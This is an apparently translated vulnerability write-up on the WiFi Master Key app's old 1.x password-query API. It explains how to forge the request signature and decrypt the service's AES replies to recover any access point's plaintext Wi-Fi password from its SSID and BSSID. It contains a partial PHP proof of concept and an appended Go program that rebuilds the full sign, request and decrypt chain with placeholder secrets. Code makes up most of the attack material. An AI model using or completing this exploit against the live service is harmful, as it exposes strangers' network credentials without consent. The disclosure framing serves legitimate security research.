WIFI universal key password query interface algorithm cracking (unlimited query of users' AP plaintext passwords)

Source: Internet
Author: User
Tags: bssid

Every app has to talk to a backend over some interface. After decompiling the WiFi Master Key app, its protocol turned out to be plaintext HTTP, which makes it simple to analyze.

There is one thing that helps a lot when analyzing Android apps: as a program iterates, new versions change their APIs, but for compatibility the old, flawed API versions are never taken offline and stay reachable forever...

Version 1.x of WiFi Master Key, downloaded from Google Play, still works. Unpacking the APK and analyzing it gives the algorithm straight away (the various keys and salts are stored in plaintext; there is not even obfuscation, just string concatenation...).

This is the packet used to query a password, together with the algorithm behind its sign (signature) parameter. The data is simply sorted, concatenated and MD5-hashed with a salt. The new version of WiFi Master Key adds a retSn that chains the authentication; that can be broken too, but this report only covers the API problems of version 1.x (in the 1.x era many details were obviously not thought through, and the sign is the only security measure).

Signing a password query request in Java

To verify it, I took a nearby OpenWrt SSID, "1OpenWrt", computed the signature and sent the query: bingo!

Part one is done, but the returned password is a long string, so it seems the user's plaintext password is not actually disclosed. Yet the client has to connect somehow, and for that it needs the plaintext... APK analysis shows the string is AES-encrypted, and the key and IV are leaked as well.

Continuing with the Java program

Hey hey, so your password is this (same finding as this friend's analysis: http://drops.wooyun.org/papers/4976)

During testing, a prompt also appeared.

Analysis shows that each dhid has a daily query quota, so I went on to analyze the dhid algorithm; the dhid is handed out by the server. I won't go into the details of forging one here; it is the same routine: analyze the packet, compute the sign, send the packet.

With this, the plaintext password of any AP can be queried from its SSID and BSSID. To prove it while avoiding misuse, I am releasing only part of the POC code; the vendor will understand it at a glance.

function sign($array, $do) {
    // Signature algorithm: sort the request array the way the APK does
    // (testing shows PHP's ksort() matches), concatenate the values,
    // append the salt and MD5 the result.
    // SALT and SALT2 are the constants lifted from the APK; their values
    // are withheld here.
    $request_str = '';
    $sign = '';
    ksort($array);
    foreach ($array as $key => $value) {
        $request_str .= $value;
    }
    if ($do == 'querypwd') {
        $sign = md5($request_str . SALT);
    } elseif ($do == 'querydhid') {
        $sign = md5($request_str . SALT2);
    }
    return $sign;
}

Query Password

function get_pwd() {
    $ssid = addslashes($_POST['ssid']);
    $mac  = addslashes($_POST['mac']);
    $data = '';
    // Fields in the order the APK sends them. "mac" is the querying
    // client's own MAC; "dhid" is the per-device ID handed out by the
    // server (get_dhid() is not published, see above).
    $array = array(
        "och"    => "guanwang",
        "ii"     => "123456789012345",
        "appid"  => "0006",
        "pid"    => "qryapwd:commonswitch",
        "mac"    => "xx:xx:xx:xx:xx:xx",
        "lang"   => "cn",
        "bssid"  => "$mac,",
        "v"      => "58",
        "ssid"   => "$ssid,",
        "method" => "getSecurityCheckSwitch",
        "uhid"   => "a0000000000000000000000000000001",
        "st"     => "m",
        "chanid" => "googleplay",
        "dhid"   => get_dhid(),
    );
    $sign = sign($array, 'querypwd');
    // Build the POST body; the APK places sign= immediately before bssid=.
    foreach ($array as $key => $value) {
        if ($key == 'bssid') {
            $data .= "sign=" . strtoupper($sign) . "&";
        }
        $data .= "$key=" . urlencode($value) . "&";
    }
    // Sending the request and parsing the reply are deliberately left
    // out of the published POC.
    return $data;
}

AES decryption

// WiFi Master Key returns the password hex-encoded and encrypted with
// AES/CBC/NoPadding. AESKey and AESIV are the constants recovered from
// the APK (values withheld). mcrypt was removed in PHP 7.2; on newer PHP
// the equivalent is openssl_decrypt() with OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING.
function decryptString($str, $keys = AESKey, $iv = AESIV, $cipher_alg = MCRYPT_RIJNDAEL_128) {
    // pack("H*") turns the hex string back into the raw ciphertext bytes.
    $decrypted_string = mcrypt_decrypt($cipher_alg, $keys, pack("H*", $str), MCRYPT_MODE_CBC, $iv);
    return $decrypted_string;
}


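The whole chain, written out in Go as an added example (this is not the page's PHP POC, the author's Java program, or vendor code): the sort-concatenate-MD5 signature from the packet analysis above, the POST body layout of the PHP POC, and the AES/CBC/NoPadding decryption of the returned string. The salt, key, IV, dhid and BSSID are constructed placeholders, not the values from the APK; encryptPassword only exists to fabricate a sample reply offline; zero-filling the last block is an assumption about how the server pads, since the article only says NoPadding.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"encoding/hex"
	"fmt"
	"net/url"
	"sort"
	"strings"
)

// Constructed stand-ins for the constants embedded in the APK. The real
// salt, key and IV are withheld in the article and are NOT reproduced here.
const (
	signSalt = "constructed-salt-value"
	aesKey   = "0123456789abcdef" // 16 bytes: AES-128 assumed, the article gives no key length
	aesIV    = "fedcba9876543210" // 16 bytes, one AES block
)

// field is one request parameter; wire order matters for the POST body,
// so a slice is used instead of a map.
type field struct {
	key, value string
}

// sign is the scheme the article describes: sort the fields by key (PHP
// ksort), concatenate the values in that order, append the salt, MD5, and
// upper-case the hex digest. Every input is known to the client, so anyone
// holding the APK can produce a valid signature for arbitrary parameters.
func sign(fields []field, salt string) string {
	sorted := append([]field(nil), fields...)
	sort.Slice(sorted, func(i, j int) bool { return sorted[i].key < sorted[j].key })
	var b strings.Builder
	for _, f := range sorted {
		b.WriteString(f.value)
	}
	b.WriteString(salt)
	sum := md5.Sum([]byte(b.String()))
	return strings.ToUpper(hex.EncodeToString(sum[:]))
}

// buildBody produces the POST body the way the PHP POC does: fields in
// wire order, URL-encoded, with sign= inserted immediately before bssid=.
func buildBody(fields []field, sig string) string {
	parts := make([]string, 0, len(fields)+1)
	for _, f := range fields {
		if f.key == "bssid" {
			parts = append(parts, "sign="+sig)
		}
		parts = append(parts, f.key+"="+url.QueryEscape(f.value))
	}
	return strings.Join(parts, "&")
}

// decryptPassword undoes what the client does with the returned string:
// hex-decode it and run AES/CBC with the leaked key and IV. Stripping
// trailing NUL bytes is an assumption about how the server fills the last
// block. The length check matters: CryptBlocks panics on a partial block.
func decryptPassword(hexCipher string, key, iv []byte) (string, error) {
	ct, err := hex.DecodeString(hexCipher)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not a whole number of blocks", len(ct))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return strings.TrimRight(string(pt), "\x00"), nil
}

// encryptPassword exists only to construct a sample reply offline, in the
// same mode (zero-filled last block, no padding byte), so the example does
// not need the real service.
func encryptPassword(password string, key, iv []byte) (string, error) {
	pt := []byte(password)
	if rem := len(pt) % aes.BlockSize; rem != 0 {
		pt = append(pt, make([]byte, aes.BlockSize-rem)...)
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return hex.EncodeToString(ct), nil
}

// queryFields mirrors the parameter list of the PHP POC; ssid and bssid
// carry the trailing comma the APK sends. The dhid is a constructed value.
func queryFields(ssid, bssid string) []field {
	return []field{
		{"och", "guanwang"}, {"ii", "123456789012345"}, {"appid", "0006"},
		{"pid", "qryapwd:commonswitch"}, {"mac", "xx:xx:xx:xx:xx:xx"}, {"lang", "cn"},
		{"bssid", bssid + ","}, {"v", "58"}, {"ssid", ssid + ","},
		{"method", "getSecurityCheckSwitch"}, {"uhid", "a0000000000000000000000000000001"},
		{"st", "m"}, {"chanid", "googleplay"}, {"dhid", "constructed-dhid"},
	}
}

func main() {
	fields := queryFields("1OpenWrt", "00:11:22:33:44:55") // constructed BSSID
	fmt.Println("forged request body:", buildBody(fields, sign(fields, signSalt)))

	// Stand-in for the service's reply: the AP password, encrypted with the
	// key and IV that the APK ships.
	reply, _ := encryptPassword("s3cret-passw0rd", []byte(aesKey), []byte(aesIV))
	pw, err := decryptPassword(reply, []byte(aesKey), []byte(aesIV))
	if err != nil {
		panic(err)
	}
	fmt.Println("recovered plaintext:", pw)
}
```

The thing to notice is that neither sign() nor decryptPassword() needs anything the client is not shipped with, so once the APK is unpacked the "signature" and the "encryption" are both just obfuscation. The one real failure mode is a truncated or non-hex reply, which has to be rejected before CryptBlocks is reached.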
I feel I learned a lot along the way...



PS: the old version, 1.0.8, shared the user's WiFi by default, remember? Did the user really agree to that without knowing?

Solution:

Filter

 
